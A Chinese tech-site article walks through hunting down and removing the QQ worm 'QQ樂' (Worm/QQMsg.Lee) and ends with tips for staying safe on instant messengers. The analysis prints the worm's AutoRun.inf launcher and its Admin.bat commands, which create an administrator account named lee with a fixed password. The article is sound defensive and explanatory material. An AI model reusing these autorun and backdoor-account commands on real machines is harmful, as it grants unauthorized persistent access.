萬盛學電腦網

 萬盛學電腦網 >> 健康知識 >> 自啟動病毒QQ樂Worm/QQMsg查殺實戰

自啟動病毒QQ樂Worm/QQMsg查殺實戰

筆者最近遇到一個采取另類方式啟動的病毒——QQ樂(Worm/QQMsg.Lee),現把一波三折的查殺過程和一些經驗寫出來,供朋友們參考。

某日在QQ裡連續收到一位朋友發來的消息,該消息中都帶有一串網址,經證實並不是他主動發來的,於是懷疑他的電腦中了病毒。筆者首先打開金山網镖防火牆,檢查發現一個正在訪問網絡的可疑程序“System32.exe”,通過名字可以看出它是想與System32文件夾相混淆,於是點擊右上角的“結束進程”殺掉它。然後按圖索骥到C盤根目錄下找到並刪除它,接著打開了注冊表編輯器。因為一般木馬和病毒都喜歡在這裡添加自啟動鍵值,但是檢查了所有以RUN為開頭的項都沒有與這個文件相關聯的啟動項,看來這個病毒十分狡猾。

接著在資源管理器中檢查Win.ini和System.ini,因為有些病毒會在Win.ini中的[Windows]小節下的load和run字段後面,以及System.ini中的[boot]小節的Shell=Explorer.exe後面添加啟動項,以便每次開機時自動運行。誰知這些地方仍然一無所獲,不過卻意外發現系統中多出了一個管理員賬戶“Lee”,懷疑是病毒添加的,於是刪除它。

正在筆者為找不到毒源而納悶時,進程中又重新出現了病毒文件“System32.exe”,而且被刪除的賬戶也重新恢復。看來如果不找到病毒的啟動機制,就難以徹底制服它。於是筆者打開“搜索”,在“文件中的一個字或詞組”(這裡可以搜索文件內部的內容)一欄中輸入“System32.exe”,經過一番等待,在搜索結果中發現了數個“AutoRun.inf”文件,用記事本打開它,內容為:

[autorun]

open=System32.exe

原來病毒自啟動的根源在這兒。感染病毒後它會在每個分區的根目錄下創建Autorun.inf文件和病毒體System32.exe、System32dll.dll,5自學網,使得每次雙擊盤符打開時病毒都會自動運行(原理與自啟動光盤相同),這種方法確實比在注冊表中添加啟動項更不容易被發現。筆者接著又利用前面的搜索方法,查找“Lee”這個關鍵字,結果發現了一個自動創建管理員賬戶的批處理文件“Admin.bat”。用記事本打開它,內容如下:

net user lee abcd1234!@# /add

net localgroup administrators lee /add

通過內容可以看出病毒是要增加一個名為lee,密碼為abcd1234!@#的新賬戶,5自學網,然後將它加入管理員組中(即賦予管理員權限)。毒根找到了,下面就可以大開“殺戒”了,把找到的這些文件統統刪除。

IM病毒防范技巧:

1. 用QQ等即時通訊工具聊天時,除了開啟病毒和網絡防火牆以外,還要打開嵌入式防火牆,例如金山毒霸6中的“騰訊QQ、MSN Messenger、ICQ安全助手”。至少要把金山網镖等防火牆的安全級別設置到中以上,才能更有效攔截木馬程序和網絡攻擊。

2. 不要隨意點擊QQ中的鏈接,因為許多病毒都會偽裝成網頁鏈接,並通過消息中具有欺騙和誘惑的文字讓你去點擊,例如QQ小尾巴。

copyright © 萬盛學電腦網 all rights reserved